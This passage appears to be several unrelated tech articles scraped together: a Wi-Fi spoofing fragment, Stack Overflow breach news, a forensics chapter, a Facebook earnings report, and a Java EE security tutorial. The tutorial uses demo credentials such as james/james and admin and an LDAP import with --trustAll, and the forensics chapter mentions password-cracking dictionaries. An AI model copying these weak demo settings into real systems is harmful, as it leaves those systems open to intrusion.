limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
Stack Overflow confirms production systems hacked

Vincy Davis
17 May 2019
2 min read
Almost a week after the attack, Stack Overflow admitted in an official security update yesterday that its production systems had been hacked. "Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11", said Mary Ferguson, VP of Engineering at Stack Overflow.

In this short update, the company mentioned that it is investigating the extent of the access and addressing all known vulnerabilities. So far, the company has identified no breach of customer or user data, though this is not yet confirmed.

https://twitter.com/gcluley/status/1129260135778607104

Some users acknowledged that the firm has at least come forward and accepted the security violation. A user on Reddit said, "Wow. I'm glad they're letting us know early, but this sucks"

Other users think that security breaches due to hacking are very common nowadays. A user on Hacker News commented, "I think we've reached a point where it's safe to say that if you're using a service -any service - assume your data is breached (or willingly given) and accessible to some unknown third party. That third party can be the government, it can be some random marketer or it can be a malicious hacker. Just hope that you have nothing anywhere that may be of interest or value to anyone, anywhere. Good luck."

A few days ago, there were reports that Stack Overflow directly links to Facebook profile pictures. This linking unintentionally allows user activity throughout Stack Exchange, including the topics that users are interested in, to be tracked by Facebook.

Read More: Facebook again, caught tracking Stack Overflow user activity and data

Stack Overflow has also assured users that more information will be provided once the company concludes its investigation.

Stack Overflow survey data further confirms Python's popularity as it moves above Java in the most used programming language list
2019 Stack Overflow survey: A quick overview
Stack Overflow is looking for a new CEO as Joel Spolsky becomes Chairman
Selecting and Analyzing Digital Evidence

Packt
08 Apr 2016
13 min read
In this article, Richard Boddington, the author of Practical Digital Forensics, explains how the recovery and preservation of digital evidence has traditionally involved imaging devices and storing the data in bulk in a forensic file or, more effectively, in a forensic image container, notably the IlookIX .ASB container. The recovery of smaller, more manageable datasets from larger datasets from a device or network system using the ISeekDiscovery automaton is now a reality. Whether the practitioner examines an image container or an extraction of information in the ISeekDiscovery container, it should be possible to overview the recovered information and develop a clearer perception of the type of evidence that should be located. Once acquired, the image or device may be searched to find evidence, and locating evidence requires a degree of analysis combined with practitioner knowledge and experience. The process of selection involves analysis, and as new leads open up, the search for more evidence intensifies until ultimately, a thorough search is completed. The searching process involves the analysis of possible evidence, from which evidence may be discarded, collected, or tagged for later reexamination, thereby instigating the selection process. The final two stages of the investigative process are the validation of the evidence, aimed at determining its reliability, relevance, authenticity, accuracy, and completeness, and finally, the presentation of the evidence to interested parties, such as the investigators, the legal team, and ultimately, the legal adjudicating body. (For more resources related to this topic, see here.) Locating digital evidence Locating evidence from the all-too-common large dataset requires some filtration of extraneous material, which has, until recently, been a mainly manual task of sorting the wheat from the chaff. But it is important to clear the clutter and noise of busy operating systems and applications from which only a small amount of evidence really needs to be gleaned. Search processes involve searching in a file system and inside files, and common searches for files are based on names or patterns in their names, keywords in their content, and temporal data (metadata) such as the last access or written time. A pragmatic approach to the examination is necessary, where the onus is on the practitioner to create a list of key words or search terms to cull specific, probative, and case-related information from very large groups of files. Searching desktops and laptops Home computer networks are normally linked to the Internet via a modem and various peripheral devices: a scanner, printer, external hard drive, thumb drive storage device, a digital camera, a mobile phone and a range of users. In an office network this would be a more complicated network system. The linked connections between the devices and the Internet with the terminal leave a range of traces and logging records in the terminal and on some of the devices and the Internet. E-mail messages will be recorded externally on the e-mail server, the printer may keep a record of print jobs, the external storage devices and the communication media also leave logs and data linked to the terminal. All of this data may assist in the reconstruction of key events and provide evidence related to the investigation. Using the logical examination process (booting up the image) it is possible to recover a limited number of deleted files and reconstruct some of the key events of relevance to an investigation. 
It may not always be possible to boot up a forensic image and view it in its logical format, which is easier and more familiar to users. However, viewing the data inside a forensic image in it physical format provides unaltered metadata and a greater number of deleted, hidden and obscured files that provide accurate information about applications and files. It is possible to view the containers that hold these histories and search records that have been recovered and stored in a forensic file container. Selecting digital evidence For those unfamiliar with investigations, it is quite common to misread the readily available evidence and draw incorrect conclusions. Business managers attempting to analyze what they consider are the facts of a case would be wise to seek legal assistance in selecting and evaluating evidence on which they may wish to base a case. Selecting the evidence involves analysis of the located evidence to determine what events occurred in the system, their significance, and the probative value to the case. The selection analysis stage requires the practitioner to carefully examine the available digital evidence ensuring that they do not misinterpret the evidence and make imprudent presumptions without carefully cross-checking the information. It is a fact-finding process where an attempt is made to develop a plausible reconstruction of the facts. As in conventional crime investigations, practitioners should look for evidence that suggests or indicates motive (why?), means (how?) and opportunity (when?) for suspects to commit the crime, but in cases dependent on digital evidence, it can be a vexatious process. There are often too many potential suspects, which complicates the process of linking the suspect to the events. The following figure shows a typical family network setup using Wi-Fi connections to the home modem that facilitates connection to the Internet. In this case, the parents provided the broadband service for themselves and for three other family members. One of the children's girlfriend completed her university assignments on his computer and synchronized her iPad to his device. The complexity of a typical household network and determining the identity of the transgressor The complexity of a typical household network and determining the identity of the transgressor More effective forensic tools Various forensic tools are available to assist the practitioner in selecting and collating data for examination analysis and investigation. Sorting order from the chaos of even a small personal computer can be a time-consuming and frustrating process. As the digital forensic discipline develops, better and more reliable forensic tools have been developed to assist practitioners in locating, selecting, and collating evidence from larger, complex datasets. To varying degrees, most digital forensic tools used to view and analyze forensic images or attached devices provide helpful user interfaces for locating and categorizing information relevant to the examination. The most advanced application that provides access and convenient viewing of files is the Category Explorer feature in ILookIX, which divides files by type, signature, and properties. Category Explorer also allows the practitioner to create custom categories to group files by relevance. For example, in a criminal investigation involving a conspiracy, the practitioner could create a category for the first individual and a category for the second individual. 
As files are reviewed, they would then be added to either or both categories. Unlike tags, files can be added to multiple categories, and the categories can be given descriptive names. Deconstructing files The deconstruction of files involves processing compound files such as archives, e-mail stores, registry stores, or other files to extract useful and usable data from a complex file format and generate reports. Manual deconstruction adds significantly to the time taken to complete an examination. Deconstructable files are compound files that can be further broken down into smaller parts such as e-mails, archives, or thumb stores of JPG files. Once the deconstruction is completed, the files will either move into the deconstructed files or deconstruction failed files folders. Deconstructable files will now be now broken out more—e-mail, graphics, archives, and so on. Searching for files Indexing is the process of generating a table of text strings that can then be searched almost instantly any number of times. The two main uses of indexing are to create a dictionary to use when cracking passwords and to index the words for almost-instant searching. Indexing is also valuable when creating a dictionary or using any of the analysis functions built in to ILookIX. ILookIX facilitates the indexing of the entire media at the time of initial processing, all at once. This can also be done after processing. Indexing facilitates searching through files and archives, Windows Registry, e-mail lists, and unallocated space. This function is highly customizable via the setup option in order to optimize for searching or for creating a custom dictionary for password cracking. Sound indexing ensures speedy and accurate searching. Searching is the process of having ILookIX look through the evidence for a specific item, such as a string of text or an expression. An expression, in terms of searching, is a pattern used to structure data in a search, such as a credit card number or e-mail address. The Event Analysis tool ILookIX's Event Analysis tool provides the practitioner a graphical representation of events on the subject system, such as file creation, access, or modification; e-mails sent or received; and other events such as the modification of the Master File Table on an NTFS system. The application allows the practitioner to zoom in on any point on the graph to view more specific details. Clicking on any bar on the graph will return the view to the main ILookIX window and display the items from the date bar selected in the List Pane. This can be most helpful when analyzing events during specific periods. The Lead Analysis tool Lead Analysis is an interactive evidence model embedded in ILookIX that allows the practitioner to assimilate known facts into a graphic representation that directly links unseen objects. It provides the answers as the practitioner increases the detail of the design surface and brings into view specific relationships that could go unseen otherwise. The primary aim of Lead Analysis is to help discover links within the case data that may not be evident or intuitive and the practitioner may not be aware of directly or that the practitioner has little background knowledge of to help form relationships manually. Instead of finding and making note of various pieces of information, the analysis is presented as an easy-to-use link model. The complexity of the modeling is removed so that it gives the clearest possible method of discovery. 
The analysis is based on the current index database, so it is essential to index case data prior to initiating an analysis. Once a list of potential links has been generated, it is important to review them to see whether any are potentially relevant. Highlight any that are, and it will then be possible to look for words in the catalogues if they have been included. In the example scenario, the word divorce was located as it was known that Sarah was divorced from the owner of the computer (the initial suspect). By selecting any word by left-clicking on it once and clicking on the green arrow to link it to Sarah, as shown below, relationships can be uncovered that are not always clear during the first inspection of the data. Each of the stated facts becomes one starting lead on the canvas. If the nodes are related, it is easy to model that relationship by manually linking them together by selecting the first Lead Project to link, right-clicking, and selecting Add a New Port from the menu. This is then repeated for the second Lead Object the practitioner wants to link. By simply clicking on the new port of the selected object that needs to be linked from and dragging to the port of the Lead Object that it should be linked to, a line will appear linking the two together. It is then possible to iterate this process using each start node or discovered node until it is possible to make sense of the total case data. A simple relationship between suspects, locations and even concepts is illustrated in the following screenshot: ILookIX Lead Analysis discovering relationships between various entities ILookIX Lead Analysis discovering relationships between various entities Analyzing e-mail datasets Analyzing and selecting evidence from large e-mail datasets is a common task for the practitioner. ILookIX's embedded application E-mail Linkage Analysis is an interactive evidence model to help practitioners discover links between the correspondents within e-mail data. The analysis is presented as an easy-to-use link model; the complexity of the modeling is removed to provide the clearest possible method of discovery. The results of analysis are saved at the end of the modeling session for future editing. If there is a large amount of e-mail to process, this analysis generation may take a few minutes. Once the analysis is displayed, the user will see the e-mail linkage itself. It is then possible to see a line between correspondents indicating that they have a relationship of some type. Here in particular, line thickness indicates the frequency of traffic between two correspondents; therefore, thicker flow lines indicate more traffic. On the canvas, once the analysis is generated, the user may select any e-mail addressee node by left-clicking on it once. Creating the analysis is really simple, and one of the most immediately valuable resources this provides is group identification, as shown in the following screenshot. ILookIX will initiate a search for that addressee and list all e-mails where your selected addressee was a correspondent. Users may make their own connection lines by clicking on an addressee node point and dragging to another node point. Nodes can be deleted to allow linkage between smaller groups of individuals. 
The E-mail Linkage tool showing relationships of possible relevance to a case

The Volume Shadow Copy analysis tools

Shadow volumes, also known as the Volume Snapshot Service (VSS), use a service that creates point-in-time copies of files. The service is built into Windows Vista, 7, 8, and 10 and is turned on by default. ILookIX can recover true copies of overwritten files from shadow volumes, as long as they resided on the volume at the time that the snapshot was created. VSS recovery is a method of recovering extant and deleted files from the volume snapshots available on the system. ILookIX, unlike any other forensic tool, is capable of reconstructing volume shadow copies, either differential or full, including deleted files and folders.

In the test scenario, the tool recovered a total of 87,000 files, equating to conventional tool recovery rates. Using ILookIX's Xtreme File Recovery, some 337,000 files were recovered. The Maximal Full Volume Shadow Snapshot application recovered a total of 797,000 files. Using the differential process, 354,000 files were recovered, which filtered out 17,000 additional files for further analysis. This enabled the detection of e-mail messages, attachments, and Windows Registry changes that would normally remain hidden.

Summary

This article described in detail the general process of locating and selecting evidence. It also explained the nature of digital evidence and provided examples of its value in supporting a legal case. Various advanced analysis and recovery tools were demonstrated to show the reader how technology can make the location and selection processes faster and more efficient. Some of these tools are not new but have been enhanced, while others are innovative and seek out evidence normally unavailable to the practitioner.

Resources for Article:

Further resources on this subject:

Mobile Phone Forensics – A First Step into Android Forensics [article]
Introduction to Mobile Forensics [article]
BackTrack Forensics [article]
Why Wall Street unfriended Facebook: Stocks fell $120 billion in market value after Q2 2018 earnings call

Natasha Mathur
27 Jul 2018
6 min read
After been found guilty of providing discriminatory advertisements on its platform earlier this week, Facebook hit yet another wall yesterday as its stock closed falling down by 18.96% on Thursday with shares selling at $176.26. This means that the company lost around $120 billion in market value overnight, making it the largest loss of value ever in a day for a US-traded company since Intel Corp’s two-decade-old crash. Intel had lost a little over $18 billion in one day, 18 years back. Despite the 41.24% revenue growth compared to last year, this was Facebook’s biggest stock market drop ever. Here’s the stock chart from NASDAQ showing the figures:   Facebook’s market capitalization was worth $629.6 on Wednesday. As soon as Facebook’s Earnings calls concluded by the end of market trading on Thursday, it’s worth dropped to $510 billion after the close. Also, as Facebook’s market shares continued to drop down during Thursday’s market, it left its CEO, Mark Zuckerberg with less than $70 billion, wiping out nearly $17 billion of his personal stake, according to Bloomberg. Also, he was demoted from the third to the sixth position on Bloomberg’s Billionaires Index. Active user growth starting to stagnate in mature markets According to David Wehner, CFO at Facebook, “the Daily active users count on Facebook reached 1.47 billion, up 11% compared to last year, led by growth in India, Indonesia, and the Philippines. This number represents approximately 66% of the 2.23 billion monthly active users in Q2”. Facebook’s daily active users He also mentioned that  “MAUs (monthly active users) were up 228M or 11% compared to last year. It is worth noting that MAU and DAU in Europe were both down slightly quarter-over-quarter due to the GDPR rollout, consistent with the outlook we gave on the Q1 call”. Facebook’s Monthly Active users In fact, Facebook has implemented several privacy policy changes in the last few months. This is due to the European Union's General Data Protection Regulation ( GDPR ) as the company's earnings report revealed the effects of the GDPR rules. Revenue Growth Rate is falling too Speaking of revenue expectations, Wehner gave investors a heads up that revenue growth rates will decline in the third and fourth quarters. Wehner states that the company’s “total revenue growth rate decelerated approximately 7 percentage points in Q2 compared to Q1. Our total revenue growth rates will continue to decelerate in the second half of 2018, and we expect our revenue growth rates to decline by high single-digit percentages from prior quarters sequentially in both Q3 and Q4.”  Facebook reiterated further that these numbers won’t get better anytime soon.                                                 Facebook’s Q2 2018 revenue Wehner further spoke explained the reasons for the decline in revenue,“There are several factors contributing to that deceleration..we expect the currency to be a slight headwind in the second half ...we plan to grow and promote certain engaging experiences like Stories that currently have lower levels of monetization. We are also giving people who use our services more choices around data privacy which may have an impact on our revenue growth”. Let’s look at other performance indicators Other financial highlights of Q2 2018 are as follows: Mobile advertising revenue represented 91% of advertising revenue for q2 2018, which is up from approx. 87% of the advertising revenue in Q2 2017. 
- Capital expenditures for Q2 2018 were $3.46 billion, up from $1.4 billion in Q2 2017.
- Headcount was 30,275 as of June 30, an increase of 47% year-over-year.
- Cash, cash equivalents, and marketable securities were $42.3 billion at the end of Q2 2018, up from $35.45 billion at the end of Q2 2017.

Wehner also mentioned that the company "continue to expect that full-year 2018 total expenses will grow in the range of 50-60% compared to last year. In addition to increases in core product development and infrastructure -- growth is driven by increasing investments -- safety & security, AR/VR, marketing, and content acquisition".

Another reason for the overall loss is that Facebook has been dealing with criticism for quite some time over its content policies, its handling of users' private data, and its changing rules for advertisers. In fact, it is currently investigating data analytics firm Crimson Hexagon over misuse of data. Mark Zuckerberg also told financial analysts on the conference call that Facebook has been investing heavily in "safety, security, and privacy", and that because of how much they are "investing - in security that it will start to impact our profitability, we're starting to see that this quarter - we run this company for the long term, not for the next quarter".

Here's what the public feels about the recent wipe-out:

https://twitter.com/TeaPainUSA/status/1022586648155054081
https://twitter.com/alistairmilne/status/1022550933014753280

So, why did Facebook's stocks crash?

As we can see, Facebook's performance in Q2 2018 was better than its performance in the same quarter last year as far as revenue goes. Ironically, scandals and lawsuits have had little impact on Facebook's growth. For example, Facebook recovered fully from the Cambridge Analytica scandal within two months as far as share prices are concerned. The Mueller indictment report released earlier this month managed to arrest growth for merely a couple of days before the company bounced back. The discriminatory advertising verdict against Facebook had no impact on its bullish growth earlier this week. This brings us to conclude that public sentiment and market reactions against Facebook have very different underlying reasons.

The market's strong reaction is mainly due to concerns over the slowdown in active user growth, the lack of monetization opportunities on the more popular Instagram platform, and Facebook's perceived inability to adapt successfully to new political and regulatory policies such as the GDPR. Wall Street has been indifferent to Facebook's long list of scandals, in some ways enabling the company's 'move fast and break things' approach. On the earnings call on Thursday, Zuckerberg hinted that Facebook may no longer be keen on 'growth at all costs', saying things like "we're investing so much in security that it will significantly impact our profitability", with Wehner adding, "Looking beyond 2018, we anticipate that total expense growth will exceed revenue growth in 2019." And that has got Wall Street unfriending Facebook with just the click of a button!

Is Facebook planning to spy on you through your mobile's microphones?
Facebook to launch AR ads on its news feed to let you try on products virtually
Decoding the reasons behind Alphabet's record high earnings in Q2 2018


Developing Secure Java EE Applications in GlassFish

Packt
31 May 2010
14 min read
In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the series, we will cover the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying the security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

Read Designing Secure Java EE Applications in GlassFish here.

Developing the Presentation layer

The Presentation layer is the layer closest to end users when we are developing applications that are meant to be used by humans instead of other applications. In our application, the Presentation layer is a Java EE web application consisting of the elements listed below. As you can see, the JSP files are categorized into different directories to make the security description easier.

- index.jsp: The application entry point. It has links to the functional JSP pages such as toMilli.jsp.
- auth/login.html: Presents a custom login page to users when they try to access a restricted resource. This file is placed inside the auth directory of the web application.
- auth/logout.jsp: Logs users out of the system after their work is finished.
- auth/loginError.html: Unsuccessful login attempts redirect users to this page. This file is also placed inside the auth directory of the web application.
- jsp/toInch.jsp: Converts a given length to inches; it is only available to managers.
- jsp/toMilli.jsp: Converts a given length to millimeters; this page is available to any employee.
- jsp/toCenti.jsp: Converts a given length to centimeters; this functionality is available to everyone.
- Converter servlet: Receives the request, invokes the session bean to perform the conversion, and returns the value to the user.
- auth/accessRestricted.html: An error page for HTTP error 401, which occurs when authorization fails.
- Deployment descriptors: The descriptors in which we define the security constraints over the resources we want to protect.

Now that our application building blocks are identified, we can start implementing them to complete the application. Before anything else, let's implement the JSP files that provide the conversion GUI. The directory layout and content of the Web module are shown in the following figure:

Implementing the Conversion GUI

In our application we have an index.jsp file that acts as a gateway to the entire system; it is shown in the following listing:

<html>
  <head><title>Select A conversion</title></head>
  <body><h1>Select A conversion</h1>
    <a href="auth/login.html">Login</a> <br/>
    <a href="jsp/toCenti.jsp">Convert Meter to Centimeter</a> <br/>
    <a href="jsp/toInch.jsp">Convert Meter to Inch</a> <br/>
    <a href="jsp/toMilli.jsp">Convert to Millimeter</a><br/>
    <a href="auth/logout.jsp">Logout</a>
  </body>
</html>
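All of the functional pages above eventually delegate to a Conversion session bean that performs the calculations and carries the method-level authorization rules; the bean itself belongs to the Business layer covered elsewhere in this series. Purely for context, here is a minimal sketch of what such a bean and its local interface might look like. The method names and role names (employee_role, manager_role) follow this article, while the package name, annotations, and conversion arithmetic are assumptions rather than the article's actual code.

package com.example.conversion; // hypothetical package name

import javax.annotation.security.PermitAll;
import javax.annotation.security.RolesAllowed;
import javax.ejb.Local;
import javax.ejb.Stateless;

@Local
interface ConversionLocal {
    int toMilimeter(int meters);
    int toCentimeter(int meters);
    int toInch(int meters);
}

// Sketch of the session bean; the real role-to-method mapping is defined in the Business layer article.
@Stateless
public class ConversionBean implements ConversionLocal {

    @RolesAllowed({"employee_role", "manager_role"}) // any employee (or manager) may convert to millimeter
    public int toMilimeter(int meters) {
        return meters * 1000;
    }

    @PermitAll // centimeter conversion is open to everyone
    public int toCentimeter(int meters) {
        return meters * 100;
    }

    @RolesAllowed("manager_role") // only managers may convert to inch
    public int toInch(int meters) {
        return (int) Math.round(meters * 39.37);
    }
}

When a caller that is not in a permitted role invokes one of these methods, the EJB container raises javax.ejb.AccessLocalException, which is exactly what the Converter servlet in the next section catches and translates into an HTTP 401 response.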
Implementing the Converter servlet

The Converter servlet receives the conversion value and method from the JSP files and calls the corresponding method of the session bean to perform the actual conversion. The following listing shows the Converter servlet content:

@WebServlet(name="Converter", urlPatterns={"/Converter"})
public class Converter extends HttpServlet {

    @EJB
    private ConversionLocal conversionBean;

    protected void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
    }

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        System.out.println("POST");
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            int valueToconvert = Integer.parseInt(request.getParameter("meterValue"));
            String method = request.getParameter("method");
            out.print("<hr/> <center><h2>Conversion Result is: ");
            if (method.equalsIgnoreCase("toMilli")) {
                out.print(conversionBean.toMilimeter(valueToconvert));
            } else if (method.equalsIgnoreCase("toCenti")) {
                out.print(conversionBean.toCentimeter(valueToconvert));
            } else if (method.equalsIgnoreCase("toInch")) {
                out.print(conversionBean.toInch(valueToconvert));
            }
            out.print("</h2></center>");
        } catch (AccessLocalException ale) {
            response.sendError(401);
        } finally {
            out.close();
        }
    }
}

Starting from the beginning, we use annotations to configure the servlet name and URL mapping instead of using the deployment descriptor for it. Then we use dependency injection to inject an instance of the Conversion session bean into the servlet and decide which one of its methods to invoke based on the conversion type that the calling JSP sends as a parameter. Finally, we catch javax.ejb.AccessLocalException and send an HTTP 401 error back to inform the client that it does not have the required privileges to perform the requested action. The following figure shows what the result of an invocation could look like:

Note that the description elements each servlet needs can either live in the deployment descriptor or be supplied through annotations, as we did here; a sketch of the deployment descriptor alternative appears at the end of this section.

Implementing the conversion JSP files is the last step in implementing the functional pieces. In the following listing you can see the content of the toMilli.jsp file.

<html>
  <head><title>Convert To Millimeter</title></head>
  <body><h1>Convert To Millimeter</h1>
    <form method=POST action="../Converter">Enter Value to Convert:
      <input name=meterValue>
      <input type="hidden" name="method" value="toMilli">
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

The toCenti.jsp and toInch.jsp files look the same except for the descriptive content and the value of the hidden method parameter, which is toCenti and toInch respectively. Now we are finished with the functional parts of the Web layer; we just need to implement the GUI required for the security measures.
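As mentioned above, the servlet name and URL mapping that we configured with the @WebServlet annotation could instead be supplied as elements in web.xml. A minimal sketch of that equivalent is shown below; the fully qualified class name is an assumption, since the article does not state the servlet's package.

<servlet>
    <servlet-name>Converter</servlet-name>
    <!-- the package is assumed; use the servlet's actual fully qualified class name -->
    <servlet-class>com.example.web.Converter</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>Converter</servlet-name>
    <url-pattern>/Converter</url-pattern>
</servlet-mapping>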
Implementing the authentication frontend

For the authentication, we should use a custom login page to have a unified look and feel across the entire web frontend of our application. We can use a custom login page with the FORM authentication method. To implement the FORM authentication method we need a login page and an error page to which users are redirected in case authentication fails. Implementing authentication requires us to go through the following steps:

1. Implementing login.html and loginError.html
2. Including the security description in web.xml and sun-web.xml or sun-application.xml

Implementing a login page

In FORM authentication we implement our own login form to collect the username and password, and we then pass them to the container for authentication. We should let the container know which field is the username and which is the password by using standard names for these fields: the username field is j_username and the password field is j_password. To pass these fields to the container for authentication we use j_security_check as the form action. When we post to j_security_check, the servlet container takes over and authenticates the included j_username and j_password against the configured realm. The listing below shows the login.html content.

<form method="POST" action="j_security_check">
  Username: <input type="text" name="j_username"><br />
  Password: <input type="password" name="j_password"><br />
  <br />
  <input type="submit" value="Login">
  <input type="reset" value="Reset">
</form>

The following figure shows the login page, which is displayed when an unauthenticated user tries to access a restricted resource:

Implementing a logout page

A user may need to log out of our system after they're finished using it, so we need to implement a logout page. The following listing shows the logout.jsp file:

<% session.invalidate(); %>
<body>
  <center>
    <h1>Logout</h1>
    You have successfully logged out.
  </center>
</body>

Implementing a login error page

Now we should implement loginError.html, an authentication error page that informs users about their authentication failure.

<html>
  <body>
    <h2>A Login Error Occurred</h2>
    Please click <a href="login.html">here</a> for another try.
  </body>
</html>

Implementing an access restricted page

When an authenticated user without the required privileges tries to invoke a session bean method, the EJB container throws a javax.ejb.AccessLocalException. To show a meaningful error page to our users, we should either map this exception to an error page, or catch the exception, log the event for auditing purposes, and then use the sendError() method of the HttpServletResponse object to send out an error code. We will map the HTTP error code to our custom web pages with meaningful descriptions using the web.xml deployment descriptor; you will see shortly which configuration elements we use to do the mapping. The following snippet shows the accessRestricted.html file:

<body>
  <center>
    <p>You need to login to access the requested resource. To login go to
    <a href="auth/login.html">Login Page</a></p>
  </center>
</body>
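The first option mentioned above, mapping the exception itself to an error page rather than catching it in the servlet, can also be expressed declaratively in web.xml. A minimal sketch is shown here purely to illustrate that alternative; the article's own approach is to catch the exception and call sendError(401), and the location assumes the page lives under /auth as listed in the element overview.

<error-page>
    <!-- declarative alternative to catching AccessLocalException in the servlet -->
    <exception-type>javax.ejb.AccessLocalException</exception-type>
    <location>/auth/accessRestricted.html</location>
</error-page>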
Configuring deployment descriptors

So far we have implemented the files required for FORM-based authentication; we only need to include the required descriptions in the web.xml file. Looking back at the application requirement definitions, we see that anyone can use the meter to centimeter conversion functionality, while any other functionality requires the user to log in. We use three different JSP pages for the different types of conversion. We do not need any constraint on toCenti.jsp, therefore we do not need to include any definition for it. Per the application description, any employee can access the toMilli.jsp page; defining the security constraint for this page is shown in the following listing:

<security-constraint>
    <display-name>You should be an employee</display-name>
    <web-resource-collection>
        <web-resource-name>all</web-resource-name>
        <description/>
        <url-pattern>/jsp/toMilli.jsp</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
        <http-method>DELETE</http-method>
    </web-resource-collection>
    <auth-constraint>
        <description/>
        <role-name>employee_role</role-name>
    </auth-constraint>
</security-constraint>

We should put enough constraints on the toInch.jsp page so that only managers can access it. The listing below shows the security constraint definition for this page.

<security-constraint>
    <display-name>You should be a manager</display-name>
    <web-resource-collection>
        <web-resource-name>Inch</web-resource-name>
        <description/>
        <url-pattern>/jsp/toInch.jsp</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
        <description/>
        <role-name>manager_role</role-name>
    </auth-constraint>
</security-constraint>

Finally, we need to define every role we used in the deployment descriptor. The following snippet shows how we define these roles in web.xml.

<security-role>
    <description/>
    <role-name>manager_role</role-name>
</security-role>
<security-role>
    <description/>
    <role-name>employee_role</role-name>
</security-role>

Looking back at the application requirements, we need to define a data constraint to ensure that the usernames and passwords provided by our users are safe during transmission. The following listing shows how we can define the data constraint on the login.html page.

<security-constraint>
    <display-name>Login page Protection</display-name>
    <web-resource-collection>
        <web-resource-name>Authentication</web-resource-name>
        <description/>
        <url-pattern>/auth/login.html</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
    </web-resource-collection>
    <user-data-constraint>
        <description/>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
</security-constraint>

One more step and our web.xml file will be complete. In this step we define an error page for the HTTP 401 error code, which means that the application server is unable to perform the requested action due to a negative authorization result. The following snippet shows the required elements to define this error page.

<error-page>
    <error-code>401</error-code>
    <location>/auth/accessRestricted.html</location>
</error-page>

Now that we are finished with declaring the security constraints, we can create the conversion pages, and after creating these pages we can start on the Business layer and its security requirements.
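The transport guarantee above only covers /auth/login.html; the logout page, the error page, and the credential POST to j_security_check (which resolves under /auth/ here because the form uses a relative action) are not matched by that pattern. One possible variation, shown purely as a sketch of an assumed policy rather than something the article requires, is to widen the pattern to the whole auth subtree:

<security-constraint>
    <display-name>Protect the whole authentication subtree</display-name>
    <web-resource-collection>
        <web-resource-name>Authentication pages</web-resource-name>
        <!-- broader than the article's /auth/login.html pattern; adjust to your own policy -->
        <url-pattern>/auth/*</url-pattern>
    </web-resource-collection>
    <user-data-constraint>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
</security-constraint>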
Specifying the security realm

Up to this point we have defined all the constraints that our application requires, but we still need one more step to complete the application's security configuration: specifying the security realm and the authentication method. We will use FORM authentication and, per the application description, authentication must happen against the company-wide LDAP server, so here we are going to use the LDAP security realm LDAPRealm. We need to import a new LDIF file into our LDAP server, which contains the group and user definitions required for this article. To import the file we can use the following command, assuming that you have downloaded the source code bundle from https://www.packtpub.com//sites/default/files/downloads/9386_Code.zip and extracted it:

import-ldif --ldifFile path/to/chapter03/users.ldif --backendID userRoot --clearBackend --hostname 127.0.0.1 --port 4444 --bindDN cn=gf cn=admin --bindPassword admin --trustAll --noPropertiesFile

The following table shows the users and groups that are defined inside the users.ldif file.

Username and password    Group membership
james/james              manager, employee
meera/meera              employee

We used OpenDS for the realm data storage; it holds two users, one in the employee group only and the other in both the manager and employee groups. To configure the authentication realm we need to include the following snippet in the web.xml file.

<login-config>
    <auth-method>FORM</auth-method>
    <realm-name>LDAPRealm</realm-name>
    <form-login-config>
        <form-login-page>/auth/login.html</form-login-page>
        <form-error-page>/auth/loginError.html</form-error-page>
    </form-login-config>
</login-config>

If we treated our Web and EJB modules as separate modules, we would have to specify the role mappings for each module separately using the GlassFish deployment descriptors sun-web.xml and sun-ejb-jar.xml. But we are going to bundle our modules as an Enterprise Application Archive (EAR) file, so we can use the GlassFish deployment descriptor for enterprise applications to define the role mapping in one place and let all modules use that definition. The following listing shows the role and group mapping in the sun-application.xml file.

<sun-application>
    <security-role-mapping>
        <role-name>manager_role</role-name>
        <group-name>manager</group-name>
    </security-role-mapping>
    <security-role-mapping>
        <role-name>employee_role</role-name>
        <group-name>employee</group-name>
    </security-role-mapping>
    <realm>LDAPRealm</realm>
</sun-application>

The security-role-mapping element we used in sun-application.xml has the same schema as the security-role-mapping element of the sun-web.xml and sun-ejb-jar.xml files. You may have noticed that there is a realm element in addition to the role mapping elements: we can use the realm element of sun-application.xml to specify the default authentication realm for the entire application instead of specifying it for each module separately.

Summary

In this article series, we covered the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure Business layer using EJBs
- Developing a secure Presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying the security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

We learnt how to develop a secure Java EE application with all standard modules including Web, EJB, and application client modules.